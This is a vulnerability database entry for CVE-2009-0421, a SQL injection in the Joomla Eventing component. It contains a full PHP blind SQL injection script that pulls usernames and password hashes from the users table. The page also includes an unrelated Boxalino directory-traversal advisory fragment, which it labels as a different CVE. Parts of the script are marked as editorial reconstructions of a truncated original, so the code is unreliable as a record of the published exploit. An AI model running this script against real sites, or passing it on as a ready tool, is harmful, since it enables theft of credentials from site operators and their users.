CVE-2009-0421 (published 2009-02-05)
Priority: P3 · 45 · high
CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit: public (Exploit-DB 7793)
EPSS: 2.04% (78.8th percentile)
SQL injection vulnerability in the Eventing (com_eventing) 1.6.x component for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter to index.php.
Affected (6 ranges listed; the page gives no version bounds for any of them)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joomla | com_eventing | not given (description names 1.6.x) | not given |
No detection rules found.
Exploit-DB
boxalino 09.05.25-0421 - Directory Traversal (exploitdb · 2009-10-20 · CVSS 7.5 · CVE-2009-1479 [HIGH])
Note: this entry concerns CVE-2009-1479 in Boxalino, a different product and vulnerability; it is not an exploit for CVE-2009-0421.
---
#############################################################
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
#############################################################
#
# Product: Boxalino
# Vendor: Boxalino AG (www.boxalino.com)
# CVD ID: CVE-2009-1479
# Subject: Directory Traversal Vulnerabilities
# Risk: High
# Effect: Remotely exploitable
# Author: Axel Neumann
# Date: 2009-10-20
#
#############################################################
Introduction
A directory traversal vulnerability exists in the collaboration platform Boxalino [1]. Remote exploitation of a directory traversal vulnerability in Boxalino's product allows attackers to read arbitrary files on the server file system with web
Exploit-DB
Joomla! Component com_Eventing 1.6.x - Blind SQL Injection (exploitdb · 2009-01-15 · CVE-2009-0421)
---
```php
<?php
// Joomla! com_eventing 1.6.x - Blind SQL Injection (CVE-2009-0421), Exploit-DB 7793.
// Reconstruction note: the "<" comparisons of the original script were stripped when
// the page was extracted, and the page truncates inside the password loop. Loop bounds
// marked "assumed" and the password routine (mirrors the username routine) are
// editorial reconstructions, not the original text.
// Usage: php 7793.php "http://target/index.php?option=com_eventing&catid=1"

// Length of the page returned when $cond is appended to the unquoted catid value.
function page_len($url, $cond) {
    return strlen(file_get_contents($url."+and+".$cond."--"));
}

// True when the injected condition evaluated false: the response length differs
// from the true baseline $r by about the same percentage $t as "and 1=0" did.
function cond_false($url, $cond, $r, $t) {
    return abs((100-(page_len($url, $cond)/$r*100))) > $t-1;
}

// Extract column $col of the first jos_users row, one character per position.
function extract_column($url, $col, $max_len, $r, $t) {
    $sub = "(select+".$col."+from+jos_users+limit+0,1)";
    // Length: the first $i for which "length(col) > $i" is false equals the length.
    $count = 0;
    for ($i = 1; $i <= $max_len; $i++) {
        if (cond_false($url, "length(".$sub.")%3E".$i, $r, $t)) {
            $count = $i;
            break;
        }
    }
    $out = "";
    for ($j = 1; $j <= $count; $j++) {
        $probe = "ascii(substring(".$sub.",".$j.",1))%3E";
        // Scan ASCII codes two at a time; the first false "ascii > $i" pins the character
        // to $i or $i-1, and one more query decides which (as in the original).
        for ($i = 32; $i <= 122; $i += 2) {   // assumed bounds
            if (cond_false($url, $probe.$i, $r, $t)) {
                $out .= cond_false($url, $probe.($i-1), $r, $t) ? chr($i-1) : chr($i);
                break;
            }
        }
    }
    return $out;
}

if ($argc > 1) {
    $url = $argv[1];
    $r = page_len($url, "1=1");              // baseline: true condition
    echo "\nExploiting:\n";
    $w = page_len($url, "1=0");              // baseline: false condition
    $t = abs((100-($w/$r*100)));             // percentage difference for "false"
    echo "Username: ".extract_column($url, "username", 30, $r, $t);
    // 65 = md5:salt length of a Joomla 1.5 password hash (assumed upper bound)
    echo "\nPassword: ".extract_column($url, "password", 65, $r, $t)."\n";
}
```
References
http://secunia.com/advisories/33563
http://www.securityfocus.com/bid/33296
https://exchange.xforce.ibmcloud.com/vulnerabilities/48016
https://www.exploit-db.com/exploits/7793
Published: 2009-02-05